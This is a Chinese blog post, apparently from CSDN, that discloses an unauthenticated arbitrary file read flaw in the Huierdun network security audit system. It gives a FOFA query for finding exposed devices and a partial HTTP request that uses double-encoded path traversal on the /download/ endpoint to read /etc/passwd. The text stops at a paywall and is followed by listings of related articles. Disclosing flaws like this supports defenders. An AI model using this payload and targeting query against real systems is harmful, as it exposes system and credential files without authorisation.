惠尔顿-网络安全审计系统存在任意文件读取

已于 2024-03-09 17:59:44 修改
阅读量145 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-07 09:09:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136523788
版权
本文介绍了惠尔顿网络安全审计系统存在的任意文件读取漏洞,该漏洞可能导致攻击者未经验证即可读取系统关键文件,影响包括数据库配置和系统配置等,严重影响系统安全。受影响的是惠尔顿网络安全审计系统的特定版本。
摘要由CSDN通过智能技术生成

简介

惠尔顿网络安全审计系统(上网行为)是一款专业的软硬一体的上网行为管理产品,广泛应用于政府、金融、能源、教育、运营商大型企业等领域,通过用户管理、应用控制、网页过滤、内容审计、流量管理和行为分析等功能,帮助客户实现上网行为可视化、减少安全风险,减少信息泄密、遵从法律法规、提升工作效率、优化带宽资源。

漏洞描述

惠尔顿网络安全审计系统存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

影响版本

惠尔顿网络安全审计系统
Fofa:

app="惠尔顿-网络安全审计系统"

漏洞复现

GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Host: 
User-Agent: Mozill
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
尔顿 网络安全审计系统 任意文件读取漏洞复现
0xSec
02-21 821
尔顿 网络安全审计系统download接口存在任意文件读取漏洞,未经身份验证的攻击者可利用此漏洞读取系统内部敏感文件及凭证,使系统处于极不安全的状态。
尔顿-网络安全审计系统存在任意文件读取漏洞
qq_36334672的博客
03-06 283
FOFA:app=“尔顿-网络安全审计系统” 更新到最新版本
尔顿 网络安全审计系统任意文件读取漏洞-1day未公开漏洞-大量存在
weixin_43167326的博客
02-22 678
尔顿网络安全审计系统是一款专业的网络安全审计工具,旨在帮助组织评估和提升其网络安全防护水平。该系统通过对网络设备、应用程序和系统进行全面扫描和监测,发现潜在的安全漏洞和风险,并提供实时警报和建议,以加强网络安全防御措施。同时,尔顿网络安全审计系统支持定制化报告生成,帮助用户直观地了解网络安全状况,提供有效的安全管理和决策支持。其功能全面、操作简便,是企业保障信息安全的可靠利器。
[精选]慧眼网络安全审计系统-v10.pptx
09-21
【慧眼网络安全审计系统】是一款专门针对网络安全进行监控与审计的解决方案,旨在保障企业的信息安全,防止敏感信息泄露,提升网络管理效率。系统的核心目标是通过深入分析网络活动,揭示潜在的安全威胁,为企业创造...
Python自动连接网络(自动登录网络准入系统)
热门推荐
herosunly的博客
08-09 1万+
每天打开电脑第一件事就是登录网络准入系统,虽然是可以记住密码,点总是需要人工点击操作,就显得非常麻烦。多一事不如少一件事,少一事不如躺平不做事。那么如何使用Python自动连接网络(自动登录网络准入系统)呢?   最常用的是使用selenium框架,但使用selenium自动化网页操作时,会有一定的概率会被网站后台识别到。比如极客时间的网站就不能够使用selenium进行操作。本文将使用另外一种自动化工具(亲测可用),希望对大家有所帮助。......
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 1637
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全】服务基础第二阶段——第三节:Linux系统管理基础----Linux用户与组管理
goldfish8848的博客
09-07 748
SUID、SGID 和 Sticky Bit 都在Linux提权中扮演了重要⻆⾊。
如何启动网络安全计划:首先要做的事情
网络研究观
09-07 954
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
Web安全之SQL注入:如何预防及解决
J老熊
09-07 1372
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1773
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全(黑客技术)—2024自学手册
最新发布
小司机的奥拓
09-10 2851
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-04 1689
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
深入解析反射型 XSS 与存储型 XSS:原理、危害与防范
2301_77160226的博客
09-05 793
反射型 XSS 和存储型 XSS 都是常见的 XSS 攻击类型,它们的原理和危害有所不同,但都可以对用户造成严重的危害。为了防范 XSS 攻击,我们需要采取一系列的措施,如输入验证和过滤、输出编码、使用安全的 API 和框架等。同时,我们也需要教育用户提高安全意识,不要点击来自不可信来源的链接,不要在不可信的网站上输入敏感信息。
Web安全网络安全:SQL漏洞注入
hong161688的博客
09-10 687
Web安全领域,SQL注入漏洞(SQL Injection Vulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行详细阐述。
网络安全】URL解析器混淆绕过CSP实现XSS
等风来
09-09 262
许多流行的静态网站生成器都存在图像 CDN 功能,它们通过优化网站中的图像来加快页面加载速度。例如:1、利用内置的next/image组件优化图像(nextjs.org)2、Nuxt Image: Nuxt 应用的图像优化即插即用的图像优化功能,使用内置优化器对图像进行调整(image.nuxt.com)这些工具的目标都是通过将图像对应的 URL 作为输入(通常通过参数或路径),优化图像以减少加载时间。url=url=
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值